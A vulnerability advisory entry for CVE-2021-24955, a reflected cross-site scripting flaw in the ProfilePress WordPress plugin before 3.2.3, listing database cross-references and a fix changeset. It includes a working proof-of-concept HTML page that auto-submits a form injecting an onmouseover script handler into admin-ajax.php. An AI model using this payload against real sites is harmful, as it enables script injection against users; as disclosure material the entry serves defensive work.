ProfilePress < 3.2.3 - Reflected Cross-Site Scripting on form submission
Reporter | Title | Published | Views | Family |
---|---|---|---|---|
WPVulnDB | ProfilePress < 3.2.3 - Reflected Cross-Site Scripting | 15 Nov 2021 00:00 | – | wpvulndb |
CVE | CVE-2021-24955 | 13 Dec 2021 11:15 | – | cve |
Prion | Cross site scripting | 13 Dec 2021 11:15 | – | prion |
Cvelist | CVE-2021-24955 ProfilePress < 3.2.3 - Reflected Cross-Site Scripting | 13 Dec 2021 10:41 | – | cvelist |
NVD | CVE-2021-24955 | 13 Dec 2021 11:15 | – | nvd |
Source | Link |
---|---|
plugins | www.plugins.trac.wordpress.org/changeset/2626573/ |
```html
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
<input type="hidden" name="action" value="pp_get_forms_by_builder_type" />
<input type="hidden" name="data" value='" onmouseover=alert(/XSS/) style=display:block;height:1000px;width:1000px; t="' />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
var form1 = document.getElementById('hack');
form1.submit();
</script>
</html>
```